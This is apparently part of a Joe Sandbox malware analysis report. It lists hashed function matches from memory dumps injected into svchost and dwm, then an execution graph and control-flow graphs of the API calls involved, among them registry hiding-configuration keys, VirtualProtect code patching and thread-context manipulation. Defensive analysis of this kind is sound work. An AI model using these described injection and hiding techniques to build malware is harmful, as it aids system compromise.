                                                                                • Instruction ID: b1c30dd4f9db59132618a29f70b08293222acfcfbe393f64703705fb9c5697ee
                                                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                • Instruction Fuzzy Hash: C161D73A55DA44C6E7608B55E85035AB7A0F3C8746F600226EA8D5BBA9DF7CC952CF00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction ID: d541997ebc00b2a5cceab2fa8774ec3b9982276d4687afb42848031f678c4168
                                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction Fuzzy Hash: 0E11913BA54E00C1F6981165EC563E53040EBEC376F740AA9BA763E3F68F148C634944
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2690081130.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction ID: 5307f03f800e756aa5a3f3b814202ce4077b08ad189adc188728c76bbf75e883
                                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction Fuzzy Hash: 3511A33AA54E01C1F6641165FC563E930C36BDD37EFF80624AA76FEBD6AE188C434904
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID:
                                                                                • API String ID: 1092925422-0
                                                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction ID: 0463c626952a5afa813e324d381295324227a4e08269efaa1482c53d52e0f2cf
                                                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction Fuzzy Hash: 28112A3E708F44C2EB149B11F8183A976A1F788B86F548029DE891B7A5EE3DC916CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2690081130.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction ID: 6d85c8afa4a9c86aa0a373ec3f14b916e9f711b5b4402a039322b6514f2db16d
                                                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction Fuzzy Hash: B651B3BA71AA00CAEB14CF15DC44B9AB3A5F3C8B99F658124DE066B748DF34D842DB04
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2690081130.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction ID: b3f0edccf99905f382a7346637925336b1100363b4094cf102ded9bfb40b3313
                                                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction Fuzzy Hash: 2031E2B9615B40D6E710DF11EC447AAB7A4F3C8BDAF258014AE4B6B744CF38C942DB04
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                • Instruction ID: 23d0eaace0ac68930566f5e0a1521823ac540ad42edf416a2ae561af69bd9217
                                                                                • Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                • Instruction Fuzzy Hash: FF111C3A518F88D2E7549F66E84425A7360F7CDF85F148129EB8A17725DF38C4528B40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                • Instruction ID: 64904f6f34f6a3ab1502068cd7f5f3d2df93d8577a900f431e13ba3132b13b92
                                                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                • Instruction Fuzzy Hash: 9171E73A248F89C5E7249F25DD543EAB390F7DCB86F644016DE496BB9ADE34C9068F00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction ID: 079086d1646fb036f3f4b3483ba4c92b44b37e4bbaba34a90f94b8ec2cd7063b
                                                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction Fuzzy Hash: 5F51C73A24CF85C1E6259E25E9543EE7751F3D9781FA14026DD892BB9BCE35C8038F40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction ID: f0c433f3343e4af7e0caadf0e79506d533a505cf38706b0738dc18345a1afc4d
                                                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction Fuzzy Hash: 7B418077215A40C2EB609F25E8443EAB7A0F7CCB85F544125EA8D9B7A8DF38C952CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Stringtry_get_function
                                                                                • String ID: LCMapStringEx
                                                                                • API String ID: 2588686239-3893581201
                                                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                • Instruction ID: aa35f81f19f9c3d912f4463f41fcb8b318c76f2755ccf529b36f8a280980f6b4
                                                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                • Instruction Fuzzy Hash: 8C11083A608B84C6D760CB16F88079AB7A4F7CDB90F644126EE8D97B69DF38C5518B00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction ID: da811fd2e96297730f88a3f3636776792f3bb495db94cf25facd77d8cbf65429
                                                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction Fuzzy Hash: FB113036208B84C2EB618B15F94039977A0F788B95F684220EF8D1BB65DF38C952CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                • String ID: InitializeCriticalSectionEx
                                                                                • API String ID: 539475747-3084827643
                                                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction ID: 1527ba6ea90d43fa9bd87db690250a9e812e030b6af49a45b9236171b8b9a2e6
                                                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction Fuzzy Hash: 88F0BE3A714F84D1EB049B51FC007D43220ABCCB82FA89121AA592BB65CE78C8A6CF40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Valuetry_get_function
                                                                                • String ID: FlsSetValue
                                                                                • API String ID: 738293619-3750699315
                                                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction ID: 48d736319ca0e22af96894bd074dbc127beba1d3cfdca6214cc1789fa3050852
                                                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction Fuzzy Hash: A3E0657A205E44D1EA054B64FC047D43221ABCCB82FA89121D5191E7A5CE38CCA7CF00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2690081130.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: try_get_function
                                                                                • String ID: November$October
                                                                                • API String ID: 2742660187-1636048786
                                                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                • Instruction ID: 0393590c33e19164a8c07664aed2b4602683238996804b9f85fec93e4178c60c
                                                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                • Instruction Fuzzy Hash: F7E06DB9608D41D2EA059B55EC413E43261DBDC75AF795021D5192E352CE38C887EA00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction ID: f6d149c8d84ff1c0aabae68c35d5f754b94e87aa1729b5fc27a634e008e7874e
                                                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction Fuzzy Hash: E621713B648F84D1EB118F69E80439AB3A0FBC8B95F254114DE8C5BB65EF78C5538B00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                • Instruction ID: c28a327e80012aa0a233f74c9237465530d9d6b6bff2c160f9e8f97ef2e044da
                                                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                • Instruction Fuzzy Hash: 53E0ED76611A00C6E7049F66DC1839976E1FBCDF52F59C028C9490B360DF7D88AACB50

                                                                                Execution Graph

                                                                                Execution Coverage:1.3%
                                                                                Dynamic/Decrypted Code Coverage:94.4%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:107
                                                                                Total number of Limit Nodes:16
                                                                                execution_graph 21306 26db15c3b99 21307 26db15c3ae6 21306->21307 21308 26db15c3b36 VirtualQuery 21307->21308 21309 26db15c3b50 21307->21309 21310 26db15c3b6a VirtualAlloc 21307->21310 21308->21307 21308->21309 21310->21309 21311 26db15c3b9b GetLastError 21310->21311 21311->21307 21311->21309 21312 26db1592908 21313 26db1592936 21312->21313 21314 26db1592994 VirtualAlloc 21313->21314 21317 26db1592aa7 21313->21317 21316 26db15929b8 21314->21316 21314->21317 21315 26db1592a2b LoadLibraryA 21315->21316 21316->21315 21316->21317 21318 26db15c2a7c 21320 26db15c2ac1 21318->21320 21319 26db15c2b20 21320->21319 21322 26db15c3930 21320->21322 21323 26db15c393d StrCmpNIW 21322->21323 21324 26db15c3952 21322->21324 21323->21324 21324->21320 21325 26db15f2908 21326 26db15f2936 21325->21326 21327 26db15f2994 VirtualAlloc 21326->21327 21328 26db15f29b8 21326->21328 21327->21328 21329 26db15c1c28 21335 26db15c1650 GetProcessHeap 21329->21335 21331 26db15c1c3e Sleep SleepEx 21333 26db15c1c37 21331->21333 21333->21331 21334 26db15c15c0 StrCmpIW StrCmpW 21333->21334 21380 26db15c18dc 9 API calls 21333->21380 21334->21333 21336 26db15c1670 _invalid_parameter_noinfo 21335->21336 21381 26db15c1274 GetProcessHeap 21336->21381 21338 26db15c1678 21339 26db15c1274 2 API calls 21338->21339 21340 26db15c1689 21339->21340 21341 26db15c1274 2 API calls 21340->21341 21342 26db15c1692 21341->21342 21343 26db15c1274 2 API calls 21342->21343 21344 26db15c169b 21343->21344 21345 26db15c16b6 RegOpenKeyExW 21344->21345 21346 26db15c16e8 RegOpenKeyExW 21345->21346 21347 26db15c18ce 21345->21347 21348 26db15c1727 RegOpenKeyExW 21346->21348 21349 26db15c1711 21346->21349 21347->21333 21351 26db15c174b 21348->21351 21352 26db15c1762 RegOpenKeyExW 21348->21352 21392 26db15c12c8 11 API calls 2 library calls 21349->21392 21385 26db15c104c RegQueryInfoKeyW 21351->21385 21355 26db15c1786 21352->21355 21356 26db15c179d RegOpenKeyExW 21352->21356 21353 26db15c171d RegCloseKey 21353->21348 21393 26db15c12c8 11 API calls 2 library calls 21355->21393 21357 26db15c17d8 RegOpenKeyExW 21356->21357 21358 26db15c17c1 21356->21358 21362 26db15c17fc 21357->21362 21363 26db15c1813 RegOpenKeyExW 21357->21363 21394 26db15c12c8 11 API calls 2 library calls 21358->21394 21395 26db15c12c8 11 API calls 2 library calls 21362->21395 21367 26db15c1837 21363->21367 21368 26db15c184e RegOpenKeyExW 21363->21368 21364 26db15c1793 RegCloseKey 21364->21356 21365 26db15c17ce RegCloseKey 21365->21357 21370 26db15c104c 4 API calls 21367->21370 21371 26db15c1889 RegOpenKeyExW 21368->21371 21372 26db15c1872 21368->21372 21369 26db15c1809 RegCloseKey 21369->21363 21375 26db15c1844 RegCloseKey 21370->21375 21373 26db15c18c4 RegCloseKey 21371->21373 21374 26db15c18ad 21371->21374 21376 26db15c104c 4 API calls 21372->21376 21373->21347 21377 26db15c104c 4 API calls 21374->21377 21375->21368 21378 26db15c187f RegCloseKey 21376->21378 21379 26db15c18ba RegCloseKey 21377->21379 21378->21371 21379->21373 21396 26db15d3170 21381->21396 21384 26db15c12ba _invalid_parameter_noinfo 21384->21338 21386 26db15c10b9 21385->21386 21387 26db15c11b5 RegCloseKey 21385->21387 21386->21387 21388 26db15c10c7 RegEnumValueW 21386->21388 21387->21352 21390 26db15c111c _invalid_parameter_noinfo __free_lconv_mon 21388->21390 21389 26db15c1149 GetProcessHeap 21389->21390 21390->21387 21390->21388 21390->21389 21391 26db15c117f GetProcessHeap 21390->21391 21391->21390 21392->21353 21393->21364 21394->21365 21395->21369 21397 26db15c128f GetProcessHeap 21396->21397 21397->21384 21398 26db15c562d 21400 26db15c5634 21398->21400 21399 26db15c569b 21400->21399 21401 26db15c5717 VirtualProtect 21400->21401 21402 26db15c5751 21401->21402 21403 26db15c5743 GetLastError 21401->21403 21403->21402 21404 26db15c5dd0 21405 26db15c5ddd 21404->21405 21406 26db15c5de9 21405->21406 21407 26db15c5efa 21405->21407 21408 26db15c5e6d 21406->21408 21409 26db15c5e1e 21406->21409 21411 26db15c5f21 VirtualProtect FlushInstructionCache 21407->21411 21412 26db15c5fde 21407->21412 21410 26db15c5e46 SetThreadContext 21409->21410 21410->21408 21411->21407 21413 26db15c5ffe 21412->21413 21426 26db15c44c0 VirtualFree 21412->21426 21422 26db15c4ed0 GetCurrentProcess 21413->21422 21416 26db15c6003 21417 26db15c6057 21416->21417 21418 26db15c6017 ResumeThread 21416->21418 21427 26db15c7a20 RtlLookupFunctionEntry capture_previous_context _handle_error 21417->21427 21419 26db15c604b 21418->21419 21419->21416 21421 26db15c609f 21423 26db15c4eec 21422->21423 21424 26db15c4f02 VirtualProtect FlushInstructionCache 21423->21424 21425 26db15c4f33 21423->21425 21424->21423 21425->21416 21426->21413 21427->21421

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction ID: 87c83e2915f8249e18b336f407c21b775241cdec14b1ae9ec4ad32d63c3a8eb2
                                                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction Fuzzy Hash: BE713C76B10A98C6EB509F66EC98AA927F4F784B8CF025111DE4D57B2CEF3AC544C344

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 53 26db15c5c10-26db15c5c37 54 26db15c5c39-26db15c5c48 53->54 55 26db15c5c4b-26db15c5c56 GetCurrentThreadId 53->55 54->55 56 26db15c5c58-26db15c5c5d 55->56 57 26db15c5c62-26db15c5c69 55->57 60 26db15c608f-26db15c60a6 call 26db15c7a20 56->60 58 26db15c5c7b-26db15c5c8f 57->58 59 26db15c5c6b-26db15c5c76 call 26db15c5a40 57->59 63 26db15c5c9e-26db15c5ca4 58->63 59->60 66 26db15c5caa-26db15c5cb3 63->66 67 26db15c5d75-26db15c5d96 63->67 69 26db15c5cfa-26db15c5d6d call 26db15c45f0 call 26db15c4590 call 26db15c4550 66->69 70 26db15c5cb5-26db15c5cf8 call 26db15c86a0 66->70 71 26db15c5d9c-26db15c5dbc GetThreadContext 67->71 72 26db15c5eff-26db15c5f10 call 26db15c759f 67->72 82 26db15c5d70 69->82 70->82 75 26db15c5efa 71->75 76 26db15c5dc2-26db15c5de3 71->76 86 26db15c5f15-26db15c5f1b 72->86 75->72 76->75 85 26db15c5de9-26db15c5df2 76->85 82->63 88 26db15c5e72-26db15c5e83 85->88 89 26db15c5df4-26db15c5e05 85->89 90 26db15c5f21-26db15c5f78 VirtualProtect FlushInstructionCache 86->90 91 26db15c5fde-26db15c5fee 86->91 100 26db15c5ef5 88->100 101 26db15c5e85-26db15c5ea3 88->101 96 26db15c5e07-26db15c5e1c 89->96 97 26db15c5e6d 89->97 98 26db15c5fa9-26db15c5fd9 call 26db15c798c 90->98 99 26db15c5f7a-26db15c5f84 90->99 94 26db15c5ffe-26db15c600a call 26db15c4ed0 91->94 95 26db15c5ff0-26db15c5ff7 91->95 115 26db15c600f-26db15c6015 94->115 95->94 104 26db15c5ff9 call 26db15c44c0 95->104 96->97 106 26db15c5e1e-26db15c5e68 call 26db15c3a50 SetThreadContext 96->106 97->100 98->86 99->98 107 26db15c5f86-26db15c5fa1 call 26db15c4470 99->107 101->100 102 26db15c5ea5-26db15c5ef0 call 26db15c39e0 call 26db15c75bd 101->102 102->100 104->94 106->97 107->98 119 26db15c6057-26db15c6075 115->119 120 26db15c6017-26db15c6055 ResumeThread call 26db15c798c 115->120 122 26db15c6089 119->122 123 26db15c6077-26db15c6086 119->123 120->115 122->60 123->122
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
                                                                                • Instruction ID: 80fde9d1640f6b1750ca6396175daa9841ad995cc5c5f47da6c99ea39dc0c8ce
                                                                                • Opcode Fuzzy Hash: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
                                                                                • Instruction Fuzzy Hash: 23D1BE76718B8885DA70DF5AE89436A77F0F389B88F114212EA8D47BA9CF7DC541CB04

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 125 26db15c51b0-26db15c51dc 126 26db15c51ed-26db15c51f6 125->126 127 26db15c51de-26db15c51e6 125->127 128 26db15c5207-26db15c5210 126->128 129 26db15c51f8-26db15c5200 126->129 127->126 130 26db15c5221-26db15c522a 128->130 131 26db15c5212-26db15c521a 128->131 129->128 132 26db15c522c-26db15c5231 130->132 133 26db15c5236-26db15c5241 GetCurrentThreadId 130->133 131->130 134 26db15c57b3-26db15c57ba 132->134 135 26db15c5243-26db15c5248 133->135 136 26db15c524d-26db15c5254 133->136 135->134 137 26db15c5256-26db15c525c 136->137 138 26db15c5261-26db15c526a 136->138 137->134 139 26db15c526c-26db15c5271 138->139 140 26db15c5276-26db15c5282 138->140 139->134 141 26db15c5284-26db15c52a9 140->141 142 26db15c52ae-26db15c5305 call 26db15c57c0 * 2 140->142 141->134 147 26db15c531a-26db15c5323 142->147 148 26db15c5307-26db15c530e 142->148 151 26db15c5335-26db15c533e 147->151 152 26db15c5325-26db15c5332 147->152 149 26db15c5316 148->149 150 26db15c5310 148->150 154 26db15c5386-26db15c538a 149->154 153 26db15c5390-26db15c5396 150->153 155 26db15c5353-26db15c5378 call 26db15c7950 151->155 156 26db15c5340-26db15c5350 151->156 152->151 157 26db15c53c5-26db15c53cb 153->157 158 26db15c5398-26db15c53b4 call 26db15c4470 153->158 154->153 166 26db15c540d-26db15c5422 call 26db15c3da0 155->166 167 26db15c537e 155->167 156->155 161 26db15c53f5-26db15c5408 157->161 162 26db15c53cd-26db15c53ec call 26db15c798c 157->162 158->157 168 26db15c53b6-26db15c53be 158->168 161->134 162->161 172 26db15c5431-26db15c543a 166->172 173 26db15c5424-26db15c542c 166->173 167->154 168->157 174 26db15c544c-26db15c549a call 26db15c8d50 172->174 175 26db15c543c-26db15c5449 172->175 173->154 178 26db15c54a2-26db15c54aa 174->178 175->174 179 26db15c55b7-26db15c55bf 178->179 180 26db15c54b0-26db15c559b call 26db15c7520 178->180 182 26db15c55c1-26db15c55d4 call 26db15c4670 179->182 183 26db15c5603-26db15c560b 179->183 192 26db15c559d 180->192 193 26db15c559f-26db15c55ae call 26db15c4140 180->193 194 26db15c55d6 182->194 195 26db15c55d8-26db15c5601 182->195 185 26db15c5617-26db15c5626 183->185 186 26db15c560d-26db15c5615 183->186 190 26db15c5628 185->190 191 26db15c562f 185->191 186->185 189 26db15c5634-26db15c5641 186->189 197 26db15c5643 189->197 198 26db15c5644-26db15c5699 call 26db15c86a0 189->198 190->191 191->189 192->179 202 26db15c55b2 193->202 203 26db15c55b0 193->203 194->183 195->179 197->198 204 26db15c569b-26db15c56a3 198->204 205 26db15c56a8-26db15c5741 call 26db15c45f0 call 26db15c4550 VirtualProtect 198->205 202->178 203->179 210 26db15c5751-26db15c57b1 205->210 211 26db15c5743-26db15c5748 GetLastError 205->211 210->134 211->210
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
                                                                                • Instruction ID: c1179633908476b99d54f3692733b4bbaca5f682c3a3586a2f2c9ff0b4d11fa9
                                                                                • Opcode Fuzzy Hash: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
                                                                                • Instruction Fuzzy Hash: 1D02C432719B8486E7608F55E89876AB7F0F3C5B88F114115EA8E87BA8DF7DC484CB04

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID:
                                                                                • API String ID: 1092925422-0
                                                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction ID: 605158ddde55cdb62b079d66bdf7a2781fb26b3c74eba03cc46eafb0d332cb73
                                                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction Fuzzy Hash: CA115235B05B8982FB949F62F8087BA66F0F744B88F054065DE8907758EF3EC645C708

